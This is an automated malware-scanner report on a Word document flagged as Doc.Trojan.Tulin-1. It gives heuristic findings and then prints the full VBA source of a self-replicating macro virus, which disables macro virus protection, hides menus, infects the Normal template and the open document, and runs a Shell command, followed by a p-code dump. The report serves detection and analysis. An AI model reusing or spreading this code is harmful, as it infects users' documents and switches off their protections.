MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1204.002 Malicious File
The sample is a Microsoft Word document containing malicious VBA macros, specifically an AutoOpen macro designed to execute upon document opening. The macro attempts to export itself to 'c:\mgd.sys' and then add it to the Normal template, likely to achieve persistence. The ClamAV detection 'Doc.Trojan.Tulin-1' further supports its malicious nature. The macro's primary function appears to be setting up persistence and potentially downloading additional stages, though the full payload execution is not detailed in the provided script.
Heuristics 7
-
ClamAV: Doc.Trojan.Tulin-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Tulin-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7674 bytes |
SHA-256: e79aeb90ba328e5a21350315b88083a9cd8b75b5db0dfb1312f460b9f855f12f |
|||
|
Detection
ClamAV:
Doc.Trojan.Tulin-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tulin"
Attribute VB_Base = "1Normal.tulin"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Rem " Murat mgd "
Rem " this is for tulin "
On Error Resume Next
Application.EnableCancelKey = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
CommandBars("Tools").Controls("Macro").Visible = 0
CommandBars("Tools").Controls("Templates and Add-Ins...").Visible = 0
inf_normal = False
inf_activ = False
If NormalTemplate.VBProject.VBComponents.Item(1).Name <> "tulin" Then
inf_normal = True
End If
If ActiveDocument.VBProject.VBComponents.Item(1).Name <> "tulin" Then
inf_activ = True
End If
If inf_normal <> True And inf_activ <> True Then
GoTo vir_exit
End If
If inf_normal Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\mgd.sys"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("c:\mgd.sys")
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Sub AutoClose()"
NormalTemplate.VBProject.VBComponents.Item(1).Name = "tulin"
End If
If inf_activ Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("c:\mgd.sys")
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
ActiveDocument.VBProject.VBComponents.Item(1).Name = "tulin"
End If
vir_exit:
save_flag = False
If (Month(Date) = 2 And Day(Date) = 14) Or (Month(Date) = 9 And Day(Date) = 28) Or (Month(Date) = 11 And Day(Date) = 6) Then
Selection.Paragraphs.Add
Selection.Font.Bold = True
Selection.Font.Size = 14
Selection.TypeText Text:="You Give Your Heart Today Tomorrow and Forever "
save_flag = True
End If
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "my namber is 666"
.Execute
End With
Shell ("label c:TULIN"), 0
If (inf_normal <> True And inf_activ = True) Or save_flag = True Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/6e30f12867b54fd2b98450eac2b8d5c9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/tulin - 3856 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Rem 0x000E " " Murat mgd ""
' Line #2:
' Rem 0x0016 " " this is for tulin ""
' Line #3:
' OnError (Resume Next)
' Line #4:
' Line #5:
' LitDI2 0x0000
' Ld Application
' MemSt EnableCancelKey
' Line #6:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #7:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #8:
' LitDI2 0x0000
' Ld Options
' MemSt ConfirmConversions
' Line #9:
' Line #10:
' LitDI2 0x0000
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Visible
' Line #11:
' LitDI2 0x0000
' LitStr 0x0018 "Templates and Add-Ins..."
' LitStr 0x0005 "Tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Visible
' Line #12:
' Line #13:
' LitVarSpecial (False)
' St inf_normal
' Line #14:
' LitVarSpecial (False)
' St inf_activ
' Line #15:
' Line #16:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0005 "tulin"
' Ne
' IfBlock
' Line #17:
' LitVarSpecial (True)
' St inf_normal
' Line #18:
' EndIfBlock
' Line #19:
' Line #20:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd New
' LitStr 0x0005 "tulin"
' Ne
' IfBlock
' Line #21:
' LitVarSpecial (True)
' St inf_activ
' Line #22:
' EndIfBlock
' Line #23:
' Line #24:
' Ld inf_normal
' LitVarSpecial (True)
' Ne
' Ld inf_activ
' LitVarSpecial (True)
' Ne
' And
' IfBlock
' Line #25:
' GoTo vir_exit
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.